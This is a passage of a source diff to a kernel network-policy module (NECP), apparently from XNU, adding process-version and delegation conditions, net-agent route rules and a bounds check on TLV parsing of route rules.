cond_domain, cond_pid, cond_uid, cond_bound_interface, cond_traffic_class, cond_protocol, &cond_local_start, &cond_local_end, cond_local_prefix, &cond_remote_start, &cond_remote_end, cond_remote_prefix, &cond_agent_type, &cond_sdk_version, cond_client_flags, cond_signing_identifier, cond_packet_filter_tags, ultimate_result, ultimate_result_parameter); + necp_kernel_policy_id policy_id = necp_kernel_socket_policy_add(policy->order, session->session_order, session->proc_pid, master_condition_mask, master_condition_negated_mask, cond_app_id, cond_real_app_id, cond_custom_entitlement, cond_account_id, cond_domain, cond_pid, cond_pid_version, cond_uid, cond_bound_interface, cond_traffic_class, cond_protocol, &cond_local_start, &cond_local_end, cond_local_prefix, &cond_remote_start, &cond_remote_end, cond_remote_prefix, &cond_agent_type, &cond_sdk_version, cond_client_flags, cond_signing_identifier, cond_packet_filter_tags, ultimate_result, ultimate_result_parameter); if (policy_id == 0) { NECPLOG0(LOG_DEBUG, "Error applying socket kernel policy"); @@ -3986,10 +4015,10 @@ necp_kernel_policy_get_new_id(bool socket_level) return newid; } -#define NECP_KERNEL_VALID_SOCKET_CONDITIONS (NECP_KERNEL_CONDITION_APP_ID | NECP_KERNEL_CONDITION_REAL_APP_ID | NECP_KERNEL_CONDITION_DOMAIN | NECP_KERNEL_CONDITION_ACCOUNT_ID | NECP_KERNEL_CONDITION_PID | NECP_KERNEL_CONDITION_UID | NECP_KERNEL_CONDITION_ALL_INTERFACES | NECP_KERNEL_CONDITION_BOUND_INTERFACE | NECP_KERNEL_CONDITION_TRAFFIC_CLASS | NECP_KERNEL_CONDITION_PROTOCOL | NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_ENTITLEMENT | NECP_KERNEL_CONDITION_CUSTOM_ENTITLEMENT | NECP_KERNEL_CONDITION_AGENT_TYPE | NECP_KERNEL_CONDITION_HAS_CLIENT | NECP_KERNEL_CONDITION_LOCAL_NETWORKS | NECP_KERNEL_CONDITION_CLIENT_FLAGS | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_PLATFORM_BINARY | NECP_KERNEL_CONDITION_SDK_VERSION | NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER | NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS | NECP_KERNEL_CONDITION_IS_LOOPBACK) +#define NECP_KERNEL_VALID_SOCKET_CONDITIONS (NECP_KERNEL_CONDITION_APP_ID | NECP_KERNEL_CONDITION_REAL_APP_ID | NECP_KERNEL_CONDITION_DOMAIN | NECP_KERNEL_CONDITION_ACCOUNT_ID | NECP_KERNEL_CONDITION_PID | NECP_KERNEL_CONDITION_UID | NECP_KERNEL_CONDITION_ALL_INTERFACES | NECP_KERNEL_CONDITION_BOUND_INTERFACE | NECP_KERNEL_CONDITION_TRAFFIC_CLASS | NECP_KERNEL_CONDITION_PROTOCOL | NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_ENTITLEMENT | NECP_KERNEL_CONDITION_CUSTOM_ENTITLEMENT | NECP_KERNEL_CONDITION_AGENT_TYPE | NECP_KERNEL_CONDITION_HAS_CLIENT | NECP_KERNEL_CONDITION_LOCAL_NETWORKS | NECP_KERNEL_CONDITION_CLIENT_FLAGS | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_PLATFORM_BINARY | NECP_KERNEL_CONDITION_SDK_VERSION | NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER | NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS | NECP_KERNEL_CONDITION_IS_LOOPBACK | NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) static necp_kernel_policy_id -necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *cond_domain, pid_t cond_pid, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter) +necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *cond_domain, pid_t cond_pid, int32_t cond_pid_version, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter) { struct necp_kernel_socket_policy *new_kernel_policy = NULL; struct necp_kernel_socket_policy *tmp_kernel_policy = NULL; @@ -4046,6 +4075,7 @@ necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, } if (new_kernel_policy->condition_mask & NECP_KERNEL_CONDITION_PID) { new_kernel_policy->cond_pid = cond_pid; + new_kernel_policy->cond_pid_version = cond_pid_version; } if (new_kernel_policy->condition_mask & NECP_KERNEL_CONDITION_UID) { new_kernel_policy->cond_uid = cond_uid; @@ -4562,7 +4592,7 @@ necp_kernel_socket_policy_is_unnecessary(struct necp_kernel_socket_policy *polic } if (compared_policy->condition_mask & NECP_KERNEL_CONDITION_PID && - compared_policy->cond_pid != policy->cond_pid) { + (compared_policy->cond_pid != policy->cond_pid || compared_policy->cond_pid_version != policy->cond_pid_version)) { continue; } @@ -4970,7 +5000,7 @@ necp_lookup_route_rule_locked(struct necp_route_rule_list *list, u_int32_t route } static struct necp_route_rule * -necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_int32_t default_action, u_int8_t cellular_action, u_int8_t wifi_action, u_int8_t wired_action, u_int8_t expensive_action, u_int8_t constrained_action, u_int32_t *if_indices, u_int8_t *if_actions) +necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_int8_t default_action, u_int8_t cellular_action, u_int8_t wifi_action, u_int8_t wired_action, u_int8_t expensive_action, u_int8_t constrained_action, u_int32_t *if_indices, u_int8_t *if_actions, uuid_t netagent_uuid) { struct necp_route_rule *searchentry = NULL; struct necp_route_rule *foundentry = NULL; @@ -5011,10 +5041,32 @@ necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_i break; } } - if (!match_failed && count_a == count_b) { - foundentry = searchentry; - break; + + if (match_failed || count_a != count_b) { + continue; + } + + bool has_agent_a = uuid_is_null(netagent_uuid); + bool has_agent_b = (searchentry->netagent_id != 0); + if (has_agent_a != has_agent_b) { + continue; } + + if (has_agent_a) { + struct necp_uuid_id_mapping *mapping = necp_uuid_lookup_uuid_with_service_id_locked(searchentry->netagent_id); + if (mapping == NULL) { + // Bad mapping, doesn't match + continue; + } + if (uuid_compare(mapping->uuid, netagent_uuid) != 0) { + // UUIDs don't match + continue; + } + } + + // Rules match! + foundentry = searchentry; + break; } } @@ -5027,7 +5079,7 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ size_t offset = 0; u_int32_t route_rule_id = 0; struct necp_route_rule *existing_rule = NULL; - u_int32_t default_action = NECP_ROUTE_RULE_ALLOW_INTERFACE; + u_int8_t default_action = NECP_ROUTE_RULE_ALLOW_INTERFACE; u_int8_t cellular_action = NECP_ROUTE_RULE_NONE; u_int8_t wifi_action = NECP_ROUTE_RULE_NONE; u_int8_t wired_action = NECP_ROUTE_RULE_NONE; @@ -5039,6 +5091,8 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ u_int8_t if_actions[MAX_ROUTE_RULE_INTERFACES]; memset(&if_actions, 0, sizeof(if_actions)); + uuid_t netagent_uuid = {}; + LCK_RW_ASSERT(&necp_kernel_policy_lock, LCK_RW_ASSERT_EXCLUSIVE); if (route_rules_array == NULL || route_rules_array_size == 0) { @@ -5046,12 +5100,20 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ } // Process rules - while (offset < route_rules_array_size) { + while ((offset + sizeof(u_int8_t) + sizeof(u_int32_t)) < route_rules_array_size) { ifnet_t rule_interface = NULL; char interface_name[IFXNAMSIZ]; u_int32_t length = 0; u_int8_t *value = necp_buffer_get_tlv_value(route_rules_array, offset, &length); + if (offset + sizeof(u_int8_t) + sizeof(u_int32_t) + length > route_rules_array_size) { + // Invalid TLV goes beyond end of the rules array + break; + } + + // Increment offset for the next time through the loop + offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length; + u_int8_t rule_type = necp_policy_condition_get_type_from_buffer(value, length); u_int8_t rule_flags = necp_policy_condition_get_flags_from_buffer(value, length); u_int32_t rule_length = necp_policy_condition_get_value_length_from_buffer(value, length); @@ -5062,6 +5124,27 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ continue; } + if (rule_type == NECP_ROUTE_RULE_USE_NETAGENT) { + if (rule_length < sizeof(uuid_t)) { + // Too short, skip + continue; + } + + if (!uuid_is_null(netagent_uuid)) { + if (uuid_compare(netagent_uuid, rule_value) != 0) { + // UUIDs don't match, skip + continue; + } + } else { + // Copy out agent UUID + memcpy(netagent_uuid, rule_value, sizeof(netagent_uuid)); + } + + // Adjust remaining length + rule_value += sizeof(netagent_uuid); + rule_length -= sizeof(netagent_uuid); + } + if (rule_length == 0) { if (rule_flags & NECP_ROUTE_RULE_FLAG_CELLULAR) { cellular_action = rule_type; @@ -5081,12 +5164,10 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ if (rule_flags == 0) { default_action = rule_type; } - offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length; continue; } if (num_valid_indices >= MAX_ROUTE_RULE_INTERFACES) { - offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length; continue; } @@ -5099,10 +5180,9 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ ifnet_release(rule_interface); } } - offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length; } - existing_rule = necp_lookup_route_rule_by_contents_locked(list, default_action, cellular_action, wifi_action, wired_action, expensive_action, constrained_action, if_indices, if_actions); + existing_rule = necp_lookup_route_rule_by_contents_locked(list, default_action, cellular_action, wifi_action, wired_action, expensive_action, constrained_action, if_indices, if_actions, netagent_uuid); if (existing_rule != NULL) { route_rule_id = existing_rule->id; os_ref_retain_locked(&existing_rule->refcount); @@ -5112,6 +5192,9 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ if (new_rule != NULL) { memset(new_rule, 0, sizeof(struct necp_route_rule)); route_rule_id = new_rule->id = necp_get_new_route_rule_id(false); + if (!uuid_is_null(netagent_uuid)) { + new_rule->netagent_id = necp_create_uuid_service_id_mapping(netagent_uuid); + } new_rule->default_action = default_action; new_rule->cellular_action = cellular_action; new_rule->wifi_action = wifi_action; @@ -5163,6 +5246,7 @@ necp_remove_route_rule(struct necp_route_rule_list *list, u_int32_t route_rule_i if (existing_rule != NULL) { if (os_ref_release_locked(&existing_rule->refcount) == 0) { necp_remove_aggregate_route_rule_for_id(existing_rule->id); + necp_remove_uuid_service_id_mapping_with_service_id(existing_rule->netagent_id); LIST_REMOVE(existing_rule, chain); FREE(existing_rule, M_NECP); } @@ -5491,6 +5575,28 @@ necp_remove_uuid_service_id_mapping(uuid_t uuid) return FALSE; } +static bool +necp_remove_uuid_service_id_mapping_with_service_id(u_int32_t service_id) +{ + struct necp_uuid_id_mapping *existing_mapping = NULL; + + if (service_id == 0) { + return TRUE; + } + + LCK_RW_ASSERT(&necp_kernel_policy_lock, LCK_RW_ASSERT_EXCLUSIVE); + + existing_mapping = necp_uuid_lookup_uuid_with_service_id_locked(service_id); + if (existing_mapping != NULL) { + if (os_ref_release_locked(&existing_mapping->refcount) == 0) { + LIST_REMOVE(existing_mapping, chain); + FREE(existing_mapping, M_NECP); + } + return TRUE; + } + + return FALSE; +} static bool necp_kernel_socket_policies_update_uuid_table(void) @@ -6142,15 +6248,11 @@ necp_check_restricted_multicast_drop(proc_t proc, struct necp_socket_info *info, const uint32_t sdk = proc_sdk(proc); // Enforce for iOS, linked on or after version 14 - // If the caller set `check_minor_version`, only enforce starting at 14.TBD + // If the caller set `check_minor_version`, only enforce starting at 14.5 if (platform != PLATFORM_IOS || sdk == 0 || (sdk >> 16) < 14 || -#if 0 - (check_minor_version && (sdk >> 16) == 14 && ((sdk >> 8) & 0xff) < TBD)) { -#else - (check_minor_version)) { -#endif + (check_minor_version && (sdk >> 16) == 14 && ((sdk >> 8) & 0xff) < 5)) { return false; } @@ -6169,11 +6271,12 @@ necp_check_restricted_multicast_drop(proc_t proc, struct necp_socket_info *info, #define NECP_KERNEL_ADDRESS_TYPE_CONDITIONS (NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_LOCAL_NETWORKS) static void -necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_application_uuid, uuid_t responsible_application_uuid, char *account, char *domain, pid_t pid, uid_t uid, u_int16_t protocol, u_int32_t bound_interface_index, u_int32_t traffic_class, union necp_sockaddr_union *local_addr, union necp_sockaddr_union *remote_addr, u_int16_t local_port, u_int16_t remote_port, bool has_client, proc_t proc, proc_t responsible_proc, u_int32_t drop_order, u_int32_t client_flags, struct necp_socket_info *info, bool is_loopback) +necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_application_uuid, uuid_t responsible_application_uuid, char *account, char *domain, pid_t pid, int32_t pid_version, uid_t uid, u_int16_t protocol, u_int32_t bound_interface_index, u_int32_t traffic_class, union necp_sockaddr_union *local_addr, union necp_sockaddr_union *remote_addr, u_int16_t local_port, u_int16_t remote_port, bool has_client, proc_t real_proc, proc_t proc, proc_t responsible_proc, u_int32_t drop_order, u_int32_t client_flags, struct necp_socket_info *info, bool is_loopback, bool is_delegated) { memset(info, 0, sizeof(struct necp_socket_info)); info->pid = pid; + info->pid_version = pid_version; info->uid = uid; info->protocol = protocol; info->bound_interface_index = bound_interface_index; @@ -6182,6 +6285,7 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic info->drop_order = drop_order; info->client_flags = client_flags; info->is_loopback = is_loopback; + info->is_delegated = is_delegated; if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_APP_ID && !uuid_is_null(application_uuid)) { struct necp_uuid_id_mapping *existing_mapping = necp_uuid_lookup_app_id_locked(application_uuid); @@ -6226,6 +6330,10 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic info->is_platform_binary = necp_is_platform_binary(proc) ? true : false; } + if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY && real_proc != NULL) { + info->real_is_platform_binary = (necp_is_platform_binary(real_proc) ? true : false); + } + if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_ACCOUNT_ID && account != NULL) { struct necp_string_id_mapping *existing_mapping = necp_lookup_string_to_id_locked(&necp_account_id_list, account); if (existing_mapping) { @@ -6244,10 +6352,17 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic if (local_port != 0) { info->local_addr.sin6.sin6_port = local_port; } - } else if (local_port != 0) { - info->local_addr.sin6.sin6_len = sizeof(struct sockaddr_in6); - info->local_addr.sin6.sin6_family = AF_INET6; - info->local_addr.sin6.sin6_port = local_port; + } else { + if (remote_addr && remote_addr->sa.sa_len > 0) { + info->local_addr.sa.sa_family = remote_addr->sa.sa_family; + info->local_addr.sa.sa_len = remote_addr->sa.sa_len; + } else { + info->local_addr.sin6.sin6_family = AF_INET6; + info->local_addr.sin6.sin6_len = sizeof(struct sockaddr_in6); + } + if (local_port != 0) { + info->local_addr.sin6.sin6_port = local_port; + } } if (remote_addr && remote_addr->sa.sa_len > 0) { memcpy(&info->remote_addr, remote_addr, remote_addr->sa.sa_len); @@ -6340,6 +6455,7 @@ necp_application_find_policy_match_internal(proc_t proc, u_int16_t local_port = 0; u_int16_t remote_port = 0; necp_drop_all_bypass_check_result_t drop_all_bypass = NECP_DROP_ALL_BYPASS_CHECK_RESULT_NONE; + bool is_delegated = false; if (override_local_addr) { memcpy(&local_addr, override_local_addr, sizeof(local_addr)); @@ -6355,6 +6471,7 @@ necp_application_find_policy_match_internal(proc_t proc, // Initialize UID, PID, and UUIDs to the current process uid_t uid = kauth_cred_getuid(proc_ucred(proc)); pid_t pid = proc_pid(proc); + int32_t pid_version = proc_pidversion(proc); uuid_t application_uuid; uuid_clear(application_uuid); uuid_t real_application_uuid; @@ -6443,6 +6560,7 @@ necp_application_find_policy_match_internal(proc_t proc, NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "euuid"); + is_delegated = true; uuid_copy(application_uuid, value); } break; @@ -6456,6 +6574,7 @@ necp_application_find_policy_match_internal(proc_t proc, NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "uuid"); + is_delegated = true; uuid_copy(real_application_uuid, value); } break; @@ -6469,6 +6588,7 @@ necp_application_find_policy_match_internal(proc_t proc, NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "pid"); + is_delegated = true; memcpy(&pid, value, sizeof(pid_t)); } break; @@ -6482,6 +6602,7 @@ necp_application_find_policy_match_internal(proc_t proc, NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "uid"); + is_delegated = true; memcpy(&uid, value, sizeof(uid_t)); } break; @@ -6623,6 +6744,7 @@ necp_application_find_policy_match_internal(proc_t proc, proc_t found_proc = proc_find(pid); if (found_proc != PROC_NULL) { effective_proc = found_proc; + pid_version = proc_pidversion(effective_proc); release_eproc = true; } } @@ -6640,7 +6762,7 @@ necp_application_find_policy_match_internal(proc_t proc, u_int32_t route_rule_id_array[MAX_AGGREGATE_ROUTE_RULES]; size_t route_rule_id_array_count = 0; - necp_application_fillout_info_locked(application_uuid, real_application_uuid, responsible_application_uuid, account, domain, pid, uid, protocol, bound_interface_index, traffic_class, &local_addr, &remote_addr, local_port, remote_port, has_client, effective_proc, responsible_proc, drop_order, client_flags, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK)); + necp_application_fillout_info_locked(application_uuid, real_application_uuid, responsible_application_uuid, account, domain, pid, pid_version, uid, protocol, bound_interface_index, traffic_class, &local_addr, &remote_addr, local_port, remote_port, has_client, proc, effective_proc, responsible_proc, drop_order, client_flags, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK), is_delegated); matched_policy = necp_socket_find_policy_match_with_info_locked(necp_kernel_socket_policies_app_layer_map, &info, &filter_control_unit, route_rule_id_array, &route_rule_id_array_count, MAX_AGGREGATE_ROUTE_RULES, &service_action, &service, netagent_ids, netagent_use_flags, NECP_MAX_NETAGENTS, required_agent_types, num_required_agent_types, info.used_responsible_pid ? responsible_proc : effective_proc, 0, NULL, NULL, &drop_dest_policy_result, &drop_all_bypass, &flow_divert_aggregate_unit); // Check for loopback exception again after the policy match @@ -7035,7 +7157,7 @@ necp_application_find_policy_match_internal(proc_t proc, if (v6Route->rt_ifp != NULL) { *flags |= NECP_CLIENT_RESULT_FLAG_HAS_IPV6; - if (ifnet_get_nat64prefix(v6Route->rt_ifp, NULL) == 0) { + if (ifnet_get_nat64prefix(v6Route->rt_ifp, returned_result->nat64_prefixes) == 0) { *flags |= NECP_CLIENT_RESULT_FLAG_HAS_NAT64; } } @@ -7071,6 +7193,22 @@ necp_application_find_policy_match_internal(proc_t proc, // If the route gets denied, stop matching rules break; } + + // Check if there is a route rule that adds an agent + u_int32_t netagent_id = necp_route_get_netagent(rt, route_rule_id_array[route_rule_index]); + if (netagent_id != 0) { + struct necp_uuid_id_mapping *mapping = necp_uuid_lookup_uuid_with_service_id_locked(netagent_id); + if (mapping != NULL) { + for (netagent_cursor = 0; netagent_cursor < NECP_MAX_NETAGENTS; netagent_cursor++) { + if (uuid_is_null(returned_result->netagents[netagent_cursor])) { + // Found open slot + uuid_copy(returned_result->netagents[netagent_cursor], mapping->uuid); + returned_result->netagent_use_flags[netagent_cursor] = 0; + break; + } + } + } + } } if (rt != NULL && rt->rt_ifp != NULL) { @@ -7169,7 +7307,7 @@ done: } static bool -necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_app_id app_id, necp_app_id real_app_id, errno_t cred_result, u_int32_t account_id, struct substring domain, u_int8_t domain_dot_count, pid_t pid, uid_t uid, u_int32_t bound_interface_index, u_int32_t traffic_class, u_int16_t protocol, union necp_sockaddr_union *local, union necp_sockaddr_union *remote, struct necp_client_parameter_netagent_type *required_agent_types, u_int32_t num_required_agent_types, bool has_client, uint32_t client_flags, int is_platform_binary, proc_t proc, u_int16_t pf_tag, struct rtentry *rt, bool is_loopback) +necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_app_id app_id, necp_app_id real_app_id, errno_t cred_result, u_int32_t account_id, struct substring domain, u_int8_t domain_dot_count, pid_t pid, int32_t pid_version, uid_t uid, u_int32_t bound_interface_index, u_int32_t traffic_class, u_int16_t protocol, union necp_sockaddr_union *local, union necp_sockaddr_union *remote, struct necp_client_parameter_netagent_type *required_agent_types, u_int32_t num_required_agent_types, bool has_client, uint32_t client_flags, int is_platform_binary, proc_t proc, u_int16_t pf_tag, struct rtentry *rt, bool is_loopback, bool real_is_platform_binary, bool is_delegated) { if (!(kernel_policy->condition_mask & NECP_KERNEL_CONDITION_ALL_INTERFACES)) { if (kernel_policy->condition_mask & NECP_KERNEL_CONDITION_BOUND_INTERFACE) { @@ -7352,11 +7490,17 @@ necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_a // No match, matches forbidden pid return FALSE; } + if (kernel_policy->cond_pid_version != 0 && pid_version == kernel_policy->cond_pid_version) { + return FALSE; + } } else { if (pid != kernel_policy->cond_pid) { // No match, does not match required pid return FALSE; } + if (kernel_policy->cond_pid_version != 0 && pid_version != kernel_policy->cond_pid_version) { + return FALSE; + } } } @@ -7560,6 +7704,18 @@ necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_a } } + if (is_delegated && (kernel_policy->condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY)) { + if (kernel_policy->condition_negated_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) { + if (real_is_platform_binary) { + return FALSE; + } + } else { + if (!real_is_platform_binary) { + return FALSE; + } + } + } + return TRUE; } @@ -7570,7 +7726,7 @@ necp_socket_calc_flowhash_locked(struct necp_socket_info *info) } static void -necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, u_int32_t override_bound_interface, u_int32_t drop_order, proc_t *socket_proc, struct necp_socket_info *info, bool is_loopback) +necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, u_int32_t override_bound_interface, bool override_is_inbound, u_int32_t drop_order, proc_t *socket_proc, struct necp_socket_info *info, bool is_loopback) { struct socket *so = NULL; proc_t sock_proc = NULL; @@ -7582,10 +7738,7 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc info->drop_order = drop_order; info->is_loopback = is_loopback; - - if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PID) { - info->pid = ((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid); - } + info->is_delegated = ((so->so_flags & SOF_DELEGATED) ? true : false); if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_UID) { info->uid = kauth_cred_getuid(so->so_cred); @@ -7610,7 +7763,7 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc if (inp->inp_socket->so_flags1 & SOF1_CELLFALLBACK) { info->client_flags |= NECP_CLIENT_PARAMETER_FLAG_FALLBACK_TRAFFIC; } - if (inp->inp_socket->so_flags1 & SOF1_INBOUND) { + if (inp->inp_socket->so_flags1 & SOF1_INBOUND || override_is_inbound) { info->client_flags |= NECP_CLIENT_PARAMETER_FLAG_INBOUND; } if (inp->inp_socket->so_options & SO_ACCEPTCONN || @@ -7678,10 +7831,37 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc } } + if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PID) { + info->pid = socket_pid; + info->pid_version = proc_pidversion(sock_proc != NULL ? sock_proc : curr_proc); + } + if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PLATFORM_BINARY) { info->is_platform_binary = necp_is_platform_binary(sock_proc ? sock_proc : curr_proc) ? true : false; } + if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) { + proc_t real_proc = curr_proc; + bool release_real_proc = false; + if (so->last_pid != proc_pid(real_proc)) { + if (so->last_pid == socket_pid && sock_proc != NULL) { + real_proc = sock_proc; + } else { + proc_t last_proc = proc_find(so->last_pid); + if (last_proc != NULL) { + real_proc = last_proc; + release_real_proc = true; + } + } + } + if (real_proc != NULL) { + info->real_is_platform_binary = (necp_is_platform_binary(real_proc) ? true : false); + if (release_real_proc) { + proc_rele(real_proc); + } + } + } + if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_ACCOUNT_ID && inp->inp_necp_attributes.inp_account != NULL) { struct necp_string_id_mapping *existing_mapping = necp_lookup_string_to_id_locked(&necp_account_id_list, inp->inp_necp_attributes.inp_account); if (existing_mapping) { @@ -7850,7 +8030,7 @@ necp_socket_find_policy_match_with_info_locked(struct necp_kernel_socket_policy continue; } - if (necp_socket_check_policy(policy_search_array[i], info->application_id, info->real_application_id, info->cred_result, info->account_id, domain_substring, domain_dot_count, info->pid, info->uid, info->bound_interface_index, info->traffic_class, info->protocol, &info->local_addr, &info->remote_addr, required_agent_types, num_required_agent_types, info->has_client, info->client_flags, info->is_platform_binary, proc, pf_tag, rt, info->is_loopback)) { + if (necp_socket_check_policy(policy_search_array[i], info->application_id, info->real_application_id, info->cred_result, info->account_id, domain_substring, domain_dot_count, info->pid, info->pid_version, info->uid, info->bound_interface_index, info->traffic_class, info->protocol, &info->local_addr, &info->remote_addr, required_agent_types, num_required_agent_types, info->has_client, info->client_flags, info->is_platform_binary, proc, pf_tag, rt, info->is_loopback, info->real_is_platform_binary, info->is_delegated)) { if (policy_search_array[i]->result == NECP_KERNEL_POLICY_RESULT_SOCKET_FILTER) { if (return_filter && *return_filter != NECP_FILTER_UNIT_NO_FILTER) { necp_kernel_policy_filter control_unit = policy_search_array[i]->result_parameter.filter_control_unit; @@ -8114,7 +8294,7 @@ necp_socket_find_policy_match(struct inpcb *inp, struct sockaddr *override_local // Lock lck_rw_lock_shared(&necp_kernel_policy_lock); - necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, override_bound_interface, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK)); + necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, override_bound_interface, false, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK)); // Check info u_int32_t flowhash = necp_socket_calc_flowhash_locked(&info); @@ -8363,7 +8543,8 @@ necp_socket_find_policy_match(struct inpcb *inp, struct sockaddr *override_local necp_socket_ip_tunnel_tso(inp); } - if (send_local_network_denied_event) { + if (send_local_network_denied_event && inp->inp_policyresult.network_denied_notifies == 0) { + inp->inp_policyresult.network_denied_notifies++; necp_send_network_denied_event(((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid), ((so->so_flags & SOF_DELEGATED) ? so->e_uuid : so->last_uuid), NETPOLICY_NETWORKTYPE_LOCAL); @@ -9550,6 +9731,70 @@ necp_route_is_allowed(struct rtentry *route, struct ifnet *interface, u_int32_t return TRUE; } +static uint32_t +necp_route_get_netagent(struct rtentry *route, u_int32_t route_rule_id) +{ + if (route == NULL) { + return 0; + } + + struct ifnet *ifp = route->rt_ifp; + if (ifp == NULL) { + return 0; + } + + struct necp_route_rule 